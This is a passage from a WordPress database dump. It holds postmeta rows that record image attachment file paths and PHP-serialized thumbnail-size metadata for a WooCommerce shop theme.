'),(2382,2795,'_wp_attachment_image_alt','a'),(2383,2796,'_wp_attached_file','2018/02/slika14.jpg'),(2384,2796,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:19:\"2018/02/slika14.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"slika14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"slika14-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slika14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slika14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slika14-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"slika14-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"slika14-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"slika14-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:19:\"slika14-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"slika14-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"slika14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"slika14-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2385,2795,'_wp_attachment_image_alt','a'),(2386,2796,'_wp_attachment_image_alt','a'),(2387,2797,'_wp_attached_file','2018/02/slika15.jpg'),(2388,2797,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:19:\"2018/02/slika15.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"slika15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"slika15-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slika15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slika15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slika15-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"slika15-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"slika15-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"slika15-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:19:\"slika15-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"slika15-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"slika15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"slika15-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2389,2796,'_wp_attachment_image_alt','a'),(2390,2797,'_wp_attachment_image_alt','a'),(2391,2798,'_wp_attached_file','2018/02/slika16.jpg'),(2392,2798,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:19:\"2018/02/slika16.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"slika16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"slika16-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slika16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slika16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slika16-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"slika16-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"slika16-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"slika16-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:19:\"slika16-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"slika16-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"slika16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"slika16-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2393,2797,'_wp_attachment_image_alt','a'),(2394,2798,'_wp_attachment_image_alt','a'),(2395,2798,'_wp_attachment_image_alt','a'),(2396,2830,'_wp_attached_file','2018/02/Logo-footer-smaller-350-x-.png'),(2397,2830,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:103;s:4:\"file\";s:38:\"2018/02/Logo-footer-smaller-350-x-.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:38:\"Logo-footer-smaller-350-x--300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"Logo-footer-smaller-350-x--100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Logo-footer-smaller-350-x--300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"Logo-footer-smaller-350-x--150x103.png\";s:5:\"width\";i:150;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:38:\"Logo-footer-smaller-350-x--300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:38:\"Logo-footer-smaller-350-x--300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"Logo-footer-smaller-350-x--100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2398,4345,'_wp_attached_file','2018/02/Logo-footer-smaller-350-x-1-2.png'),(2399,4345,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:103;s:4:\"file\";s:41:\"2018/02/Logo-footer-smaller-350-x-1-2.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-2-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Logo-footer-smaller-350-x-1-2-300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-2-150x103.png\";s:5:\"width\";i:150;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-2-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-2-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2400,2833,'_wp_attached_file','2018/02/breadcrumb.jpg'),(2401,2833,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:140;s:4:\"file\";s:22:\"2018/02/breadcrumb.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"breadcrumb-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"breadcrumb-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"breadcrumb-600x44.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:44;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"breadcrumb-300x22.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"breadcrumb-1024x75.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"breadcrumb-150x140.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"breadcrumb-768x56.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:56;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"breadcrumb-630x140.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"breadcrumb-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"breadcrumb-1536x112.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"breadcrumb-550x140.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"breadcrumb-1100x140.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"breadcrumb-550x140.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:23:\"breadcrumb-1100x140.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"breadcrumb-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"breadcrumb-600x44.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:44;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"breadcrumb-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2402,4346,'_wp_attached_file','2018/02/breadcrumb-1.jpg'),(2403,4346,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:140;s:4:\"file\";s:24:\"2018/02/breadcrumb-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"breadcrumb-1-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"breadcrumb-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"breadcrumb-1-600x44.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:44;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"breadcrumb-1-300x22.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"breadcrumb-1-1024x75.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"breadcrumb-1-150x140.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"breadcrumb-1-768x56.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:56;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:24:\"breadcrumb-1-630x140.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:24:\"breadcrumb-1-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:25:\"breadcrumb-1-1536x112.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:24:\"breadcrumb-1-550x140.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:25:\"breadcrumb-1-1100x140.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:24:\"breadcrumb-1-550x140.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:25:\"breadcrumb-1-1100x140.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"breadcrumb-1-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"breadcrumb-1-600x44.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:44;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"breadcrumb-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2404,2833,'_wp_attachment_image_alt','o'),(2405,4346,'_wp_attachment_image_alt','o'),(2406,2896,'_wp_attached_file','2018/02/h8-img-10.png'),(2407,2896,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:136;s:6:\"height\";i:94;s:4:\"file\";s:21:\"2018/02/h8-img-10.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-10-100x94.png\";s:5:\"width\";i:100;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-10-100x94.png\";s:5:\"width\";i:100;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2408,4347,'_wp_attached_file','2018/02/h8-img-10-1.png'),(2409,4347,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:136;s:6:\"height\";i:94;s:4:\"file\";s:23:\"2018/02/h8-img-10-1.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"h8-img-10-1-100x94.png\";s:5:\"width\";i:100;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"h8-img-10-1-100x94.png\";s:5:\"width\";i:100;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2410,2896,'_wp_attachment_image_alt','o'),(2411,4347,'_wp_attachment_image_alt','o'),(2412,2935,'_wp_attached_file','2018/02/h5-tabs-img-1.png'),(2413,2935,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:459;s:6:\"height\";i:306;s:4:\"file\";s:25:\"2018/02/h5-tabs-img-1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h5-tabs-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-459x300.png\";s:5:\"width\";i:459;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"h5-tabs-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_leng